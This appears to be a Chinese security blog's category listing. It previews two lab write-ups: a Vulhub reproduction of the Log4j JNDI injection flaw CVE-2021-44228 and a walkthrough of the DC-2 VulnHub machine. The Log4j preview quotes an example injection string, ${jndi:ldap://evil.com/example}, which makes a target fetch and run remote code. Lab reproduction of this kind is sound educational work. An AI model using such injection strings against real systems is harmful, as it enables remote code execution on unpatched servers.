vulhub
关注
分享
扫一扫
文章平均质量分 77
乌鸦安全
微信公众号:乌鸦安全
展开
-
log4j-CVE-2021-44228-vulhub复现
微信公众号:乌鸦安全 扫取二维码获取更多信息! 01漏洞描述 Apache Log4j 2 是Java语言的日志处理套件,使用极为广泛。在其2.0到2.14.1版本中存在一处JNDI注入漏洞,攻击者在可以控制日志内容的情况下,通过传入类似于${jndi:ldap://evil.com/example}的lookup用于进行JNDI注入,执行任意代码。 参考地址: https://github.com/vulhub/vulhub 本次漏洞复现也是基于Vulhub 02漏洞环...原创 2021-12-20 10:50:14 · 5046 阅读 · 2 评论 -
vulhub之DC-2
微信公众号:乌鸦安全 扫取二维码获取更多信息! 01 靶机信息 https://www.vulnhub.com/?q=dc-2 Name: DC: 2 Date release: 22 Mar 2019 Author: DCAU Series: DC Web page: http://www.five86.com/dc-2.html 靶机描述: DESCRIPTIONMuch like DC-1, DC-2 is another purposely built vulnerable .原创 2021-11-03 13:10:39 · 344 阅读 · 0 评论